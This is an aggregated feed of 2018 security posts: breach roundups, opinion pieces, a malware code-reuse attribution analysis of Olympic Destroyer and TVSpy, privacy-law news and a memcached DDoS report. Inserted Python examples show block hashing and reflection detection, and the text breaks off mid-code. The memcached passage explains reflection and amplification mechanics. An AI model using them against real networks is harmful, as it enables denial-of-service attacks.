There's one other potentially interesting tie-in here, and that's to overall data analytics, which I've noticed slowly creeping into organizations. A lot of the focus has been on using data lakes, mining, and analytics in lieu of traditional SIEM and log management, but I think there's also a potentially interesting confluence with security KPIs. In fact, once you pull in SOAR capabilities and other monitoring and assessment data, it's not unreasonable to think that KPIs become the tweakable dials CISOs (and up) use to balance risk against reward when providing strategic guidance for addressing information risk within the enterprise. At any rate, this is all very speculative and unclear right now, but something to watch nonetheless. But I have digressed...
---
The bottom line here is this: traditional policy frameworks have generally outlived their usefulness. We cannot afford to continue writing and publishing security requirements in a format that isn't easily accessible in a "work as usual" format. In an Agile/DevOps world, "security as code" is imperative, and that includes converting security requirements into KPIs.
Warning as Mac malware exploits climb 270%
Reputable anti-malware security vendor Malwarebytes is warning Mac users that malware attacks against the platform climbed 270 percent last year.
Be careful out there
The security experts also warn that four new malware exploits targeting Macs have been identified in the first two months of 2018, noting that many of these exploits were identified by users, rather than security firms.
In one instance, a Mac user discovered that their DNS settings had been changed and found themselves unable to change them back.
Weekly Cyber Risk Roundup: Payment Card Breaches, Encryption Debate, and Breach Notification Laws
This past week saw the announcement of several new payment card breaches, including a point-of-sale breach at Applebee’s restaurants that affected 167 locations across 15 states.
The malware, which was discovered on February 13, 2018, was “designed to capture payment card information and may have affected a limited number of purchases” made at Applebee’s locations owned by RMH Franchise Holdings, the company said in a statement.
News outlets reported many of the affected locations had their systems infected between early December 2017 and early January 2018. Applebee’s has close to 2,000 locations around the world and 167 of them were affected by the incident.
In addition to Applebee’s, MenuDrive issued a breach notification to merchants saying that its desktop ordering site had been injected with malware designed to capture payment card information. The incident affected certain transactions from November 5, 2017 to November 28, 2017.
“We have learned that the malware was contained to ONLY the Desktop ordering site of the version that you are using and certain payment gateways,” the company wrote. “Thus, this incident was contained to a part of our system and did NOT impact the Mobile ordering site or any other MenuDrive versions.”
Finally, there is yet another breach notification related to Sabre Hospitality Solutions’ SynXis Central Reservations System — this time affecting Preferred Hotels & Resorts. Sabre said that an unauthorized individual used compromised user credentials to view reservation information, including payment card information, for a subset of hotel reservations that Sabre processed on behalf of the company between June 2016 and November 2017.
Other trending cybercrime events from the week include:
- Marijuana businesses targeted: MJ Freeway Business Solutions, which provides business management software to cannabis dispensaries, is notifying customers of unauthorized access to its systems that may have led to personal information being stolen. The Canadian medical marijuana delivery service JJ Meds said that it received an extortion threat demanding $1,000 in bitcoin in order to prevent a leak of customer information.
- Healthcare breach notifications: The Kansas Department for Aging and Disability Services said that the personal information of 11,000 people was improperly emailed to local contractors by a now-fired employee. Front Range Dermatology Associates announced a breach related to a now-fired employee providing patient information to a former employee. Investigators said two Florida Hospital employees stole patient records, and local news reported that 9,000 individuals may have been impacted by the theft.
- Notable data breaches: Ventiv Technology, which provides workers’ compensation claim management software solutions, is notifying customers of a compromise of employee email accounts that were hosted on Office365 and contained personal information. Catawba County services employees had their personal information compromised due to the payroll and human resources system being infected with malware. Flexible Benefit Service Corporation said that an employee email account was compromised and used to search for wire payment information. A flaw in Nike’s website allowed attackers to read server data and could have been leveraged to gain greater access to the company’s systems. A researcher claimed that airline Emirates is leaking customer data.
- Other notable events: Cary E. Williams CPA is notifying employees, shareholders, trustees and partners of a ransomware attack that led to unauthorized access to its systems. The cryptocurrency exchange Binance said that its users were the target of “a large scale phishing and stealing attempt” and those compromised accounts were used to perform abnormal trading activity over a short period of time. The spyware company Retina-X Studios said that it “is immediately and indefinitely halting its PhoneSheriff, TeenShield, SniperSpy and Mobile Spy products” after being “the victim of sophisticated and repeated illegal hackings.”
SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.
Cyber Risk Trends From the Past Week
There were several regulatory stories that made headlines this week, including the FBI’s continued push for a stronger partnership with the private sector when it comes to encryption, allegations that Geek Squad techs act as FBI spies, and new data breach notification laws.
In a keynote address at Boston College’s cybersecurity summit, FBI Director Christopher Wray said that there were 7,775 devices that the FBI could not access due to encryption in fiscal 2017, despite having approval from a judge. According to Wray, that meant the FBI could not access more than half of the devices it tried to access during the period.
“Let me be clear: the FBI supports information security measures, including strong encryption,” Wray said. “Actually, the FBI is on the front line fighting cyber crime and economic espionage. But information security programs need to be thoughtfully designed so they don’t undermine the lawful tools we need to keep the American people safe.”
However, Ars Technica noted that a consensus of technical experts has said that what the FBI has asked for is impossible.
In addition, the Electronic Frontier Foundation obtained documents via a Freedom of Information Act lawsuit that revealed the FBI and Best Buy’s Geek Squad have been working together for decades. In some cases Geek Squad techs were paid as much as $1,000 to be informants, which the EFF argued was a violation of Fourth Amendment rights as the computer searches were not authorized by their owners.
Finally, the Alabama senate unanimously passed the Alabama Breach Notification Act, and the bill will now move to the house.
“Alabama is one of two states that doesn’t have a data breach notification law,” said state Senator Arthur Orr, who sponsored Alabama’s bill. “In the case of a breach, businesses and organizations, including state government, are under no obligation to tell a person their information may have been compromised.”
With both Alabama and South Dakota recently introducing data breach notification legislation, every resident of the U.S. may soon be protected by a state breach notification law.
Security is not a buzz-word business model, but our cumulative effort

This article conveys my personal opinion towards security and its underlying revenue model; I would recommend reading it with a pinch of salt (+ tequila, while we are on it). I shall be covering either side of the coin: the heads, where pentesters try to give you a heads-up on underlying issues, and the tails, where businesses still think they can address security at the tail end of their development.
A recent conversation with a friend who's in information security triggered me to address the white elephant in the room. He works in a security services firm that provides intelligence feeds and alerts to its clients. He shared a case where his firm didn't share the right feed at the right time, even though the client was "vulnerable", because the client's subscription model was different. I understand business is essential, but on the contrary, isn't security a collective argument? I mean, tomorrow when this client gets attacked, are you just going to turn a blind eye because it didn't pay you well? I understand that remediation always costs money (or more effort), but withholding an alert about an attack you witnessed in the wild, based on how much money the client is paying you, is hard to defend.
I don't dream about a utopian world where security is obvious, but we surely can walk in that direction.
What is security to a business?
Is it a domain, a pillar or, with the buzz these days, insurance? Information security and privacy, while being the talk of the town, still come in where the business requirements end. I understand there is a paradigm shift to the left, a movement towards the inception of your "bright idea", but we are still far from an ideal world, the utopia so to speak! I have experience from either side of the table: the one where we put ourselves in the shoes of hackers, and the contrary, where we hold hands with the developers to understand their pain points and work together to build a secure ecosystem. I would say it has been very few times that a business pays attention to "security" from day zero (yeah, this tells you the kind of clients I am dealing with and why they are in business). Often business owners say: develop this application based on these requirements, discuss the revenue model and maintenance costs, and yeah! Check if we need these security add-ons, or whether we adhere to compliance checks, as no one wants auditors knocking at the door for all the wrong reasons.
This troubles me. Why don't we treat information security as a pillar as important as your whole revenue model?
How is security as a business?
I have many issues with how "security" is being tossed around as a buzzword to earn dollars, while very few respect the gravity or the very objective of its existence. I mean, whether it's information, financial, or life security, they all have very realistic and quantifiable effects on someone's physical well-being. Every month, I see tens (if not hundreds) of reports and advisories whose quality is embarrassingly bad. When you dig for the reasons, either the "good" firms are costly, or someone has a comfort zone with existing firms, or, worst of all, neither does the business care nor does it pressure firms for better quality. In the end, it's just a plain and straightforward business transaction, or a compliance check to make the auditor happy.
Have you ever asked yourself these questions?
- You did a pentest justifying the money paid for your quality; tomorrow that hospital gets hacked, or patients die. Would you say you didn't put in your best consultants/efforts because they were too expensive for the cause? That you didn't walk the extra mile because the budgeted hours ran out?
- Now, to you, Mr Business, CEO: you want to cut costs on security because you would prefer a more prominent advertisement or a better car in your garage, and security expenditure looks dubious to you. Next time, check how much companies and businesses have lost after getting breached. Just because it's not an urgent problem doesn't mean it can't become one. If it becomes a problem, chances are it's too late. These issues are like symptoms; if you see them, you are already in trouble! Security doesn't always have an immediate ROI, I understand, but don't make it the epitome of "out of sight, out of mind". That's a significant risk you are taking with your revenue, employees or customers.
Now, while I have touched both sides of the problem in this short article, I hope you got the message (fingers crossed). Please do take security seriously, and not only as a business transaction! Every time you do something that involves security, on either side, think: would you invest your next big cryptocurrency in an exchange/market that gets hacked because of its lack of due diligence? Would you have your medical records become public because someone didn't perform a good pentest? Would you lose your savings because your bank didn't do a thorough "security" check of its infrastructure? If you think you are untouchable because of your home router security, you, my friend, are living in an illusion. And my final rant, to the firms where there are good consultants but the reporting, or the seriousness in delivering the message to the business, is so fcuking messed up that all their efforts go in vain: take your deliverable seriously; it's the only window the business has to peep into the issues (existing or foreseen) and plan the remediation in time.
That's all, my friends. Stay safe and be responsible; security is a cumulative effort and everyone has to be vigilant, because you never know where the next cyber-attack will be.
Happy Anniversary – Paul’s Security Weekly #550
This week, Stefano Righi of UEFI joins us for an interview! Sven Morgenroth, Security Researcher at Netsparker joins us for the Technical Segment! In the news, we have updates from FinFisher, Equifax, Facebook, and more on this episode of Paul's Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/Episode550
Visit https://www.securityweekly.com/psw for all the latest episodes!
From Russia(?) with Code
The Olympic Destroyer cyberattack is a very recent and notable attack by sophisticated threat actors against a globally renowned 2-week sporting event that takes place once every four years in a different part of the world. Successfully attacking the Winter Olympics requires motivation, planning, resources and time.
Cyberattack campaigns are often a reflection of real-world tensions and provide insight into the possible suspects in an attack. Much has been written about the perpetrators behind Olympic Destroyer coming from either North Korea or Russia. Both have motivations. North Korea would like to embarrass its sibling South Korea, the host of the 23rd Winter Olympics. Russia could be seeking revenge for the IOC ban on its team. And Russia has precedent, having previously been blamed for attacks on other sporting organizations, such as the intrusion at the World Anti-Doping Agency that was carried out via a stolen International Olympic Committee account.
There has been much said about attribution, with accusations of misleading false flags and anti-forensics built into the malware. As Talos points out in their report, attribution is hard.
But attribution is not just hard, it’s often a wilderness of mirrors and, more often than not, a bit anticlimactic.
The motivation of the following analysis is not to point the finger of blame at whoever carried out the attack, but to use our expertise in analyzing malware code and understanding the behaviors it exhibits to highlight the heritage, evolution and commonalities we found in the code of the Olympic Destroyer malware.
Initial Samples of Code Reuse
Besides analyzing the behavior of a sample, our sandbox performs several levels of code analysis, eventually extracting all code components regardless of whether they are executed at run time. As we described in a blog post a few years ago, this technique is essential if we are to detect any dormant functionality that might be present within the sample.
After decomposing the code components in normalized basic blocks, the sandbox computes smart code hashes that are stored and indexed in our threat intelligence knowledge base. Over the last 3 years we have been collecting code hashes for millions of files, so when we want to hunt for other samples related to the same actor, we are able to query our backend for any other binaries that have been reusing significant amounts of code.
The rationale is that actors usually build up their code base over time and reuse it over and over again across different campaigns. Code surely might evolve, but some components are bound to remain the same. This is the intuition that drove our investigation of Olympic Destroyer further. The first results were, unsurprisingly, some variants of the Olympic Destroyer binaries which we already mentioned in our previous post. However, it quickly got much more interesting.
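To make the code-hash hunting concrete, here is a toy version of normalized basic-block hashing. It is an added example, not Lastline's code: the disassembly listings are constructed by hand and are not from the Olympic Destroyer or TVSpy binaries, and the normalization rules (registers, long addresses and branch targets replaced by placeholders, blocks shorter than three instructions skipped) are this example's assumptions, not the sandbox's.

```python
import hashlib
import re
from collections import defaultdict

# Registers, load addresses (5+ hex digits) and branch targets differ between builds
# of the same source, so they are replaced by placeholders before hashing.
REG_RE = re.compile(r"\b(e?[abcd]x|e?[sd]i|e?[bs]p|[abcd][lh])\b")
ADDR_RE = re.compile(r"\b0x[0-9a-f]{5,}\b")
BRANCH_RE = re.compile(r"^(j[a-z]+|call) \S+$")

def normalize(insn):
    """Canonicalize one instruction: lower-case, single spaces, generic operands."""
    insn = re.sub(r"\s+", " ", insn.strip().lower())
    insn = ADDR_RE.sub("ADDR", REG_RE.sub("REG", insn))
    return BRANCH_RE.sub(r"\1 LBL", insn)

def split_blocks(listing):
    """Split a listing into basic blocks at labels and after jumps/returns."""
    blocks, current = [], []
    for line in (raw.strip() for raw in listing.strip().splitlines()):
        if not line:
            continue
        if line.endswith(":"):  # a label begins a new block
            if current:
                blocks.append(current)
            current = []
            continue
        current.append(normalize(line))
        mnemonic = line.split()[0].lower()
        if mnemonic.startswith("j") or mnemonic == "ret":  # block terminator
            blocks.append(current)
            current = []
    if current:
        blocks.append(current)
    return blocks

def code_hashes(listing, min_len=3):
    """Hash every normalized block; blocks shorter than min_len are too common to be a link."""
    return {hashlib.sha256("\n".join(b).encode()).hexdigest()[:16]
            for b in split_blocks(listing) if len(b) >= min_len}

def build_index(samples):
    """Map each code hash to the names of the samples that contain it."""
    index = defaultdict(set)
    for name, listing in samples.items():
        for h in code_hashes(listing):
            index[h].add(name)
    return index

def rare_links(index, max_prevalence=2):
    """Hashes seen in 2..max_prevalence samples: candidate code-reuse links worth a look."""
    return {h: sorted(n) for h, n in index.items() if 2 <= len(n) <= max_prevalence}

# Constructed listings, not real disassembly. A and B carry the same PE header check
# (B with other registers plus an extra function); C is an unrelated program.
SAMPLE_A = """
load_headers:
  push ebp
  mov ebp, esp
  mov eax, [ebp+0x8]
  cmp word ptr [eax], 0x5a4d
  jne fail
  mov ecx, [eax+0x3c]
  add ecx, eax
  cmp dword ptr [ecx], 0x4550
  jne fail
  mov eax, ecx
  pop ebp
  ret
fail:
  xor eax, eax
  pop ebp
  ret
"""
SAMPLE_B = SAMPLE_A.replace("eax", "esi").replace("ecx", "edx") + """
send_beacon:
  push ebp
  mov ebp, esp
  push 0x403010
  call 0x401a20
  mov [ebp-0x4], eax
  pop ebp
  ret
"""
SAMPLE_C = """
main:
  push ebp
  mov ebp, esp
  test eax, eax
  jz done
  xor eax, eax
  leave
  ret
"""
SAMPLES = {"OlympicDestroyer-like": SAMPLE_A, "TVSpy-like": SAMPLE_B, "unrelated": SAMPLE_C}

if __name__ == "__main__":
    for h, names in rare_links(build_index(SAMPLES)).items():
        print(h, "->", ", ".join(names))
```

Run stand-alone, it prints the four block hashes that only the two header-check samples share; the unrelated sample contributes no link, which is the signal the text describes.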
A very specific code hash led us through this process: 7CE26E95118044757D3C7A97CF9D240A (Lastline customers can use it to query our Global Threat Intelligence Network). This rare code hash surprisingly linked 21ca710ed3bc536bd5394f0bff6d6140809156cf, a payload of the Olympic Destroyer campaign, with some other samples of a remote access trojan, “TVSpy.” Though the actual internal name of the threat is TVRAT, the malware is known and labelled in VirusTotal as Trojan.Pavica or Trojan.Mezzo, none of which were previously connected to the original Olympic Destroyer campaign.
Figure 1 shows the actual code referenced by the code hash: it is a function used to read a buffer and subsequently parse a PE header from it.

Figure 1: The code referenced by the code hash 7CE26E95118044757D3C7A97CF9D240A, shared by both the Olympic Destroyer sample (SHA1 21ca710ed3bc536bd5394f0bff6d6140809156cf) and the TVSpy sample a61b8258e080857adc2d7da3bd78871f88edec2c.
This is not where the code reuse ends: the function that references and invokes the fragment above (see Figure 2) also shares almost all of the same logic. This function is responsible for loading a PE file from a memory buffer and executing its entry point.

Figure 2: Function responsible for loading a PE file from memory, reused in both Olympic Destroyer and TVSpy
A Deeper Dive Based on Unusual Code
We decided to investigate this piece of code further, since loading a PE from memory is not all that common. Its origin raised several questions:
- Why is that piece of code the only link between the two samples?
- Were there any other samples sharing the same code?
Our first discovery was the remote access trojan TVSpy, mentioned above. This family has been the subject of a few previous research investigations, and a recent Benkow Lab blog post (from November 2017) even reported that the source code was available on GitHub.
Unfortunately, all links to GitHub are now dead. But that didn’t stop us from finding the actual source code (or at least evidence that it was indeed published at some point). Apparently it was sold for US$500 on an underground Russian forum in 2015. Even though the original post and links are gone, a Russian information security forum kept a copy of the source code package alongside a description of the original sale announcement (see Figure 3).

Figure 3: TVSpy code as sold in an underground forum (according to researchers from ru-sfera.org)
Not Enough – The Investigation Continued
Although interesting, this connection was not enough on its own to connect Olympic Destroyer to Russia or to TVSpy. So we kept digging. Further research finally identified the code in Figures 1 and 2 as part of an open source project called LoadDLL (see Figure 4), available on codeproject.com (first published back in March 2014).

Figure 4: Fragment of LoadDLL source code from LoadDLL project
However, a couple of things still didn’t add up: why had we only managed to identify samples from 2017 when the source code was released in 2014? What about older versions of TVSpy? Why did our search not return any of those samples? Were the Olympic Destroyer and TVSpy samples from 2017 sharing more than just the LoadDLL code?
Apparently TVSpy went through a few transformations. Samples from 2015 did embed and use the LoadDLL code, but the compiler applied some specific optimizations that made the code unique (see Figure 5). In particular, the compiler optimized out both “flags” (not used in the function) and “read_proc” (a statically linked function) from the parameters of LoadDll, but it could not optimize out the “if (read_proc)” check, even though that check is useless once “read_proc” is no longer passed as a parameter.

Figure 5. Reconstructed source code of LoadDll from TVSpy dated back to 2015
The “read_proc” function itself is also identical to the one from the source code (see Figures 6 and 7), and as you can see in Figure 8, it also gets called in exactly the same way as in the original source code from codeproject.com.

Figure 6: read_proc function implementation

Figure 7: read_proc function implementation
The most interesting aspect for us is in fact the version of TVSpy that dates back to 2017-2018 and shares with Olympic Destroyer almost the exact binary code of LoadDLL. You can see LoadDll_LoadHeaders for those samples in Figure 9: as you might notice, the function looks different from the one in the older version (see Figure 8).

Figure 8. Reconstructed source code of LoadDLL_LoadHeaders function from TVSpy dated back to 2015
At first, we thought that the authors had added new checks before calling the read_proc function, making a clear link between Olympic Destroyer and TVSpy (how, after all, could there be the same code modifications if the authors were not the same?). However, after further review we figured out that read_proc didn’t exist anymore. Instead it had been compiled inline, resulting in a statically linked memcpy function.

Figure 9. Reconstructed LoadDLL_LoadHeaders from TVSpy and OlympicDestroyer samples, including additional check due to inlining of the read_proc function.
Also, the meaningless check in LoadDll (“if (read_proc)”) that we mentioned before has disappeared in the new version of the code (see Figure 10).

Figure 10. Reconstructed LoadDLL_LoadHeaders from TVSpy and Olympic Destroyer samples, including additional check due to inlining of the read_proc function.
The Bottom Line – Evidence is Inconclusive
In conclusion, we believe that this is not enough evidence to substantiate a claim that Olympic Destroyer and the new versions of TVSpy using the same modified source code were built by the same author.
The more probable explanation for us is that the sample was built with a newer compiler that further optimized the code. It would still mean that both the new version of TVSpy and Olympic Destroyer were built using the same toolchain configured in the very same way (full optimization enabled and the C++ runtime linked statically). We actually went to the extent of compiling LoadDLL with MS Visual Studio 2017 with the C++ runtime statically linked, and we managed to get the very same code as the one included in both Olympic Destroyer and TVSpy.
Although we would have liked to finally solve the dilemma, and unveil which were the actors behind the Olympic Destroyer attack, we ended up with more questions than answers, but admittedly, that’s what research sometimes is about.
First, why would the authors of an allegedly state-sponsored malware use an old LoadDLL implementation from an open source project from 2014? It is hard to believe that they could not come up with their own implementation or use much more advanced open-source projects for that, rather than relying on an educational prototype buried well beyond the first page of Google results.
Or maybe the actors were not as advanced as we would like to think; maybe they saw this as a one-time job, without enough resources to avoid using publicly available source code to quickly build their malware? Or maybe it’s just another red flag, and the real authors decided to use the TVSpy source code as released in 2015 to leave a “Russian fingerprint”?
Maybe all of the above?
At the beginning of this article we stated that attribution is not just hard, it’s often a wilderness of mirrors and more often than not, a bit anticlimactic. As a matter of fact, that was quite a precise prediction.
The post From Russia(?) with Code appeared first on Lastline.
"Faster payment" scam is not quite what it seems
Singapore Joins the APEC CBPR and PRP Systems
On March 6, 2018, Singapore’s Ministry of Communications and Information announced that Singapore has joined the APEC Cross-Border Privacy Rules (“CBPR”) and Privacy Recognition for Processors (“PRP”) systems. As we previously reported, Singapore submitted its intent to join both systems in July 2017.
Singapore becomes the sixth APEC economy to join the CBPR system, joining the U.S., Mexico, Canada, Japan and South Korea, and the second APEC economy to join the PRP system, after the U.S. The decision to join means that once the CBPR are fully operationalized in Singapore, through a local Accountability Agent that will certify companies, Singapore-based organizations will be able to certify to the CBPR and rely on them as a cross-border data transfer mechanism. Other APEC economies actively working on joining the CBPR and PRP systems include Australia, Chinese Taipei and the Philippines.
The APEC CBPR system is a regional, multilateral cross-border data transfer mechanism and an enforceable privacy code of conduct developed for businesses by the 21 APEC member economies. The CBPR system implements the nine high-level APEC Privacy Principles set forth in the APEC Privacy Framework.
As we previously reported, the APEC PRP system allows information processors to demonstrate their ability to effectively implement an information controller’s privacy obligations related to the processing of personal information. The PRP also enables information controllers to identify qualified and accountable processors, as well as to assist small- or medium-sized processors that are not widely known to gain visibility and credibility.
CIPL Issues White Paper on GDPR Implementation in Respect of Children’s Data and Consent
On March 6, 2018, the Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams LLP issued a white paper on GDPR Implementation in Respect of Children’s Data and Consent (the “White Paper”). The White Paper sets forth guidance and recommendations concerning the application of GDPR requirements to the processing of children’s personal data. The White Paper also highlights and addresses several issues raised by the Article 29 Working Party (the “Working Party”) with regard to children in its guidelines on consent and issues raised by the UK Information Commissioner’s Office in its Consultation on Children and the GDPR.
Key points of focus in the White Paper include:
- Emphasizing that while Article 8 of the GDPR imposes specific conditions on a child’s consent in certain circumstances, other legal processing bases are still applicable and sometimes more appropriate to the processing of children’s data;
- Presenting a risk-based test to determine whether an information society service is offered directly to a child and how this could be developed within the framework of the GDPR;
- Considering the application of GDPR provisions to children’s data outside the realm of Article 8, for example, requirements on transparency, the exercise of individual rights and marketing;
- Highlighting the importance of a consistent approach to implementing national age thresholds and the potential challenges that arise from a fragmented approach; and
- Underlining the difficulties that organizations may face post-GDPR with regard to the continuation of services to children who previously consented to processing, which now falls within the scope of Article 8 of the GDPR.
To read CIPL’s position on the points above, in addition to its other recommendations, please view the full White Paper.
The White Paper was developed in the context of CIPL’s ongoing GDPR Implementation Project, a multi-year initiative involving research, workshops, webinars and white papers, supported by over 90 private sector organizations.
Master in Wi-Fi Ethical Hacking
Once Upon A Time In Shaolin – Enterprise Security Weekly #82
This week, Paul and John are accompanied by Eyal Neemany, Senior Cyber Security Researcher at Javelin Networks! In the news, we have updates from Duo Security, SolarWinds, AlgoSec, Martin Shkreli, and more on this episode of Enterprise Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ES_Episode82
Visit https://www.securityweekly.com/esw for all the latest episodes!
AV18-039: Google Releases Security Update for Chrome
AV18-038: Exim Security Advisory
Cyber Fatigue and What We Can Do About It
Dr. Richard Ford, chief scientist, is revitalizing the CISO’s mission of stopping risk and threats. New vulnerabilities keep cropping up, trapping us in a “tyranny of the urgent” mindset that causes us to focus on the day-to-day rather than the big picture.
The fight is wearing security professionals down. These challenges can range from having a threat-centric view of the world, which means that security is never done, to a limited view of the CISO’s mission.
Join us to learn how the CISO’s role needs to broaden, moving from a narrow threat-centric approach to being truly at the boardroom table driving the business. We need to start focusing on mitigating risk and losses rather than a “yes/no” perspective. Moving toward security approaches that understand user intent is an important step in making the world a better, more secure place.
Extending Behavioral Insights into Risk Adaptive Protection & Enforcement
Carefree attitudes towards data protection in the workplace have caused traditional network perimeters to dissolve and data visibility to diminish. An increasingly mobile workforce, combination of work and personal information on devices, and growing use of cloud services are all key contributors to this change.
The traditional threat-centric approach is to apply rigid policies to decide what is good or bad without context. This black-and-white approach results in frustrated users and overwhelmed admins. The reality is, everybody operates in the grey.
Guy Filippelli, vice president of User and Data Security, will discuss how a human-centric cybersecurity approach adapts to user behavior and helps security teams make better decisions.
We will explore how an effective data security system should cut through the noise of alerts and provide early warning signals to prevent important data loss. Cybersecurity that integrates capabilities like DLP and UEBA for risk-adaptive protection is tailored to the identity and intent of the individual user and continuously adjusts as behavior changes.
Insecure by design: What you need to know about defending critical infrastructure
Patching security vulnerabilities in industrial control systems (ICS) is useless in most cases and actively harmful in others, ICS security expert and former NSA analyst Robert M. Lee of Dragos told the US Senate in written testimony last Thursday. The "patch, patch, patch" mantra has become a blind tenet of faith in the IT security realm, but has little application to industrial control systems, where legacy equipment is often insecure by design.
FTC Recommends Steps to Improve Mobile Device Security Update Practices
On February 28, 2018, the Federal Trade Commission issued a report, titled Mobile Security Updates: Understanding the Issues (the “Report”), that analyzes the process by which mobile devices sold in the U.S. receive security updates and provides recommendations for improvement. The Report is based on information the FTC obtained from eight mobile device manufacturers, and from information the Federal Communications Commission collected from six wireless carriers.
The Report raises a number of issues concerning the frequency and length of time that mobile devices are patched for security vulnerabilities, including:
- The complexity of the mobile ecosystem leads to a lag time between discovery of vulnerabilities and the issuance of patches.
- Formal support periods and update schedules are rare, and vary widely in application.
- Many device manufacturers fail to maintain regular records about update support decisions, patch development time, carrier testing time, deployment time or uptake rate.
- Manufacturers provide little information to the public about support period, update frequency or end of update support.
While the Commission commends device manufacturers, carriers and operating system developers that have contributed to providing effective security updates, it also makes several recommendations to improve the security update process:
- Consumer Education: Government, industry and advocacy groups should work together to educate consumers about the significance of security update support and consumers’ role in the operating system update process.
- Length of Security Updates: Device manufacturers, operating system developers and wireless carriers should ensure that all mobile devices receive operating system security updates for a period of time that is consistent with consumers’ reasonable expectations.
- Keep and Share Support Data: Companies involved in the security update process should consider keeping and consulting records about support length, update frequency, customized patch development time, testing time and uptake rate; they also should consider sharing this information with partners to fashion appropriate policies and practices.
- Security-only Updates: Industry should continue to streamline the security update process, including by patching vulnerabilities through security-only updates, when the benefits of more immediate action outweigh the convenience of a bundled security-functionality update.
- Minimum Guaranteed Support Periods: Device manufacturers should consider adopting and disclosing minimum guaranteed security support periods (and update frequency) for their devices; they also should consider giving device owners prompt notice when security support is about to end (and when it has ended), so that consumers can make informed decisions about device replacement or post-support use.
Please Vote for Hunton: Nominated for 2018 Cyber Law Firm of the Year
Hunton & Williams LLP is honored to be nominated for Advisen’s 2018 Cyber Risk Awards in the category of Cyber Law Firm of the Year. Advisen is an industry leader in insurance consulting, and regularly hosts conferences offering insights and innovation on cyber risk. The winners are determined by online ballot and the awards will be presented in New York City on June 6, 2018.
Please show your support by voting for Hunton & Williams as 2018 Cyber Law Firm of the Year. Voting ends Friday, April 20, and is limited to one per person, so please vote now!
Additional Crispiness on the MacOS box of apples sandbox
Several improvements visible to users are:
- Sandbox updated to OS X 10.11 El Capitan. We have a High Sierra update planned for later this year.
- Detailed HTML analysis report is now available.
- Screenshots of the software under analysis to provide more contextual information:
  - Show screenshots of what a user would see
  - Help determine if the sample is waiting for user input
- Network traffic reports updated
- Country detection
- Timestamps on file operations, to help show the sequence of events.
- Process tree is shown if there is more than one level of processes
To view the detailed behavior report, click on the Behavior tab, then select the Box of Apples sandbox, then click on the detailed report link.
Some Samples that might be interesting, that contain the new features:
ec7241a6009f1fff38b481d8b4fd6efede4cc2f9d8ee20d9ca2b4ff66d656171
3b196c1c1a64aca81dec5a5143b3f2faaadcc4034b343f46f23348f34a2ef205
694c23b548249056bf90b2b2c252a8c9abfae4aeb611476cbdaa8dc112f79d8f
[Screenshot: Screenshots and File operations]
[Screenshot: DNS, IP Traffic and Behavior tags]
This is part of the Multi-Sandbox project. We’ll continue to improve our own sandbox and to work with third-party sandbox providers that wish to integrate their sandboxes into VirusTotal.
If you find any issues, or have feature requests, please don’t hesitate to reach out to us by emailing contact@virustotal.com
Everything that is happening now has happened before
Room To Walk – Business Security Weekly #76
This week, Michael & Paul interview Shawn Tuma, Cybersec and Data Privacy Attorney at Scheef & Stone, LLP! In the Article Discussion, Michael and Paul talk how to build trust with colleagues, simple concepts to free up innovation, and how to avoid death by committee! In the news, we have updates from PhishMe, Splunk, CyberX, and more on this episode of Business Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/BSWEpisode76
Visit https://www.securityweekly.com/bsw for all the latest episodes!
AV18-037: Pivotal Spring Security Update
Weekly Cyber Risk Roundup: Record-Setting DDoS Attacks, Data Breach Costs
Last week, researchers observed a 1.35 Tbps distributed denial-of-service (DDoS) attack targeting GitHub. It was the largest DDoS attack ever recorded, surpassing the 1.2 Tbps attack against DNS provider Dyn in October 2016.
The attack leveraged a newly observed reflection and amplification vector known as memcached. Akamai researchers warned that other organizations experienced similar DDoS attacks using the new method following the GitHub attack and that even larger attacks may be possible in the future.
“Memcached can have both UDP and TCP listeners and requires no authentication,” the researchers wrote. “Since UDP is easily spoofable, it makes this service vulnerable to use as a reflector. Worse, memcached can have an amplification factor of over 50,000, meaning a 203 byte request results in a 100 megabyte response.”
The attack was mitigated within 10 minutes, GitHub said. The following day GitHub was the target of a second DDoS attack that disrupted availability for a 15-minute period, ThousandEyes reported.
“Because of its ability to create such massive attacks, it is likely that attackers will adopt memcached reflection as a favorite tool rapidly,” Akamai researchers wrote. “The good news is that providers can rate limit traffic from source port 11211 and prevent traffic from entering and exiting their networks, but this will take time.”
Wired reported there are approximately 100,000 memcached servers that currently have no authentication protection and can be abused by malicious attackers to carry out similar potentially massive, botnet-free DDoS attacks.
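As an added example (not from the roundup or from Akamai's write-up), here is how a provider or victim might spot the reflection pattern described above in flow records: UDP flows arriving from source port 11211 that are orders of magnitude larger than any request the victim actually sent. The flow records and their field layout are constructed for this example; the 203-byte request figure mirrors the one quoted in the text.

```python
from collections import defaultdict
from dataclasses import dataclass

MEMCACHED_PORT = 11211  # the UDP listener abused as the reflector

@dataclass
class Flow:
    proto: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    packets: int
    octets: int

def parse_flows(text):
    """Parse the constructed flow format used below (one record per line)."""
    flows = []
    for line in text.strip().splitlines():
        proto, sip, sport, dip, dport, pkts, octs = line.split()
        flows.append(Flow(proto, sip, int(sport), dip, int(dport), int(pkts), int(octs)))
    return flows

def reflection_report(flows, min_octets=1_000_000):
    """Flag hosts receiving at least min_octets of UDP traffic from source port 11211.

    Where the spoofed request toward a reflector (victim address as source, destination
    port 11211) is also visible, the amplification factor is response bytes / request bytes.
    """
    responses = defaultdict(lambda: defaultdict(int))  # victim -> reflector -> bytes
    requests = defaultdict(int)                        # (victim, reflector) -> bytes
    for f in flows:
        if f.proto != "udp":
            continue  # a TCP session cannot be spoofed into reflecting; only UDP matters here
        if f.dst_port == MEMCACHED_PORT:
            requests[(f.src_ip, f.dst_ip)] += f.octets
        elif f.src_port == MEMCACHED_PORT:
            responses[f.dst_ip][f.src_ip] += f.octets
    report = {}
    for victim, by_reflector in responses.items():
        total = sum(by_reflector.values())
        if total < min_octets:
            continue  # ordinary-sized replies: no evidence of an attack
        amplification = {r: round(b / requests[(victim, r)])
                         for r, b in by_reflector.items() if requests.get((victim, r))}
        report[victim] = {"reflectors": sorted(by_reflector), "octets": total,
                          "amplification": amplification}
    return report

# Constructed records: proto src_ip src_port dst_ip dst_port packets bytes.
# 203.0.113.10 is the victim; 198.51.100.7/.8 are open memcached reflectors.
FLOWS = """
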